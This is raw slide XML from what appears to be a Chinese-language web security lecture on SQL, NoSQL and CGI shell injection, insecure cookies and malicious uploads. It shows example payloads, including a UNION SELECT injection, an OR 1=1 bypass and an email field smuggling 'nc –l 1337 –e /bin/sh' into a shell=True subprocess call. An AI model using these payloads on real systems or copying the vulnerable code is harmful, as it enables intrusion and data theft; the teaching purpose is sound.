                <a:srgbClr val="35A327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altLang="zh-CN" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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>
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> name, description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> items </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="195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>
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="195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12'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FFFF"/>
              </a:highlight>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327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UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="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username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1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FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3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users;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E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950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E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zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>网页中的原始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>脚本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“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UPDATE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users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SET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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>” +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highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get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‘pw’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,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‘’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)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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ “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’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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘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” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get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‘user’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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E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 ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="77A09F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950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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altLang="zh-CN" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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>
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="195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users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SET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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>passwd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D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill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FF0000"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>dude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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35A327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OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F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1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="77A09F"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menl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根本问题和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类似，没有对分隔符进行过滤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9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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>盲注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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入需要数据库的表名、列名等信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者无法直接获得</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者利用服务器泄露的信息泄露、获得这些信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发送刻意构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本，逐步猜测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1017270" lvl="2" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“表名”的第一个字符是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1017270" lvl="2" indent="-371475">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“表名”的第二个字符是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要一个指示器（如错误页面），显示成功失败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38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NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库很流行，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MongoDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是由有注入问题？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所有的不可信输入都应被验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来说亦是如此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CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：通用网关接口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Web服务通过console运行命令的接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>丰富网页内容和功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Shell注入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8063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CGI Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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26258"/>
            <a:ext cx="9224962" cy="3803249"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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D03CFF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D03CFF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>app.route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'/email'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b="1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def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rPr>
              <a:t>email_message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():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email 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req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args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get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'email'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msg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req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args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get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950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msg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''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cmd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950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sendmail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-f {0} contact@blah.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950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io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950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format(email)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p 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subprocess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Popen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cmd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stdin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subprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0" err="1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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950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PIPE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    shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1950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950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True</a:t>
            </a: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950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50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# ...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4422321" y="1949051"/>
            <a:ext cx="4993432" cy="620331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60371"/>
              <a:gd name="adj2" fmla="val 57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x@x.com y@y.com; </a:t>
            </a:r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nc</a:t>
            </a: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 –l 1337 –e /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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; cat </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412988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40" y="3351982"/>
            <a:ext cx="725925" cy="72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092" y="2727945"/>
            <a:ext cx="2811953" cy="392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客户端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24" y="3351982"/>
            <a:ext cx="789384" cy="789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5650" y="2728589"/>
            <a:ext cx="2727246" cy="3924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950">
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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321438" y="3746671"/>
            <a:ext cx="3135775" cy="307777"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378803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401624" y="3748365"/>
              <a:ext cx="3859415" cy="1748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16958" y="3387776"/>
              <a:ext cx="3529960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GET /login_form.html HTTP/1.0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21438" y="4182591"/>
            <a:ext cx="3135775" cy="314289"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817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370185" y="3774593"/>
              <a:ext cx="385941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354832" y="3387776"/>
              <a:ext cx="2054211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HTTP/1.0 200 OK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21438" y="4690377"/>
            <a:ext cx="3135775" cy="307777"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378803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4401624" y="3748365"/>
              <a:ext cx="3859415" cy="1748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773806" y="3387776"/>
              <a:ext cx="3216264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POST /cgi/login.sh HTTP/1.0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1437" y="5193361"/>
            <a:ext cx="3135775" cy="576306"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817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4370185" y="3774593"/>
              <a:ext cx="3859415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08591" y="3387776"/>
              <a:ext cx="2746709" cy="351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HTTP/1.0 302 Found</a:t>
              </a:r>
            </a:p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Set-Cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>logged_in</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>=1;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21436" y="5952562"/>
            <a:ext cx="3135775" cy="557457"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3859415" cy="29640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401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485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511410" y="3469443"/>
              <a:ext cx="3741064" cy="27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GET /private_data.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>logged_in</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>=1;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangular Callout 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784092" y="5769667"/>
            <a:ext cx="2811953" cy="523211"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 98337"/>
              <a:gd name="adj2" fmla="val -9230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不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="195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设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950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23" name="Shape 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67C3B29-6887-465D-B822-6F9820EBB6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90036" y="1853786"/>
            <a:ext cx="7467600" cy="399779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="323723">
              <a:spcBef>
                <a:spcPts val="1314"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1773">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1773">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>是会话保持的基本机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1773" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1773">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>用于身份识别、认证、和跟踪</a:t>
            </a:r>
            <a:endParaRPr sz="1773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恶意文件上传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文件注入和命令注入类似</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传一个恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>诱导用户访问该脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>攻击网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其它可能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>针对应用的图片处理代码，上传恶意图片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传多个文件，造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>覆盖关键文件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06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HTML5的安全性改进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CSP and sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage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72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HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是最新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2014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月）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>添加了很多新的功能</a:t>
            </a:r>
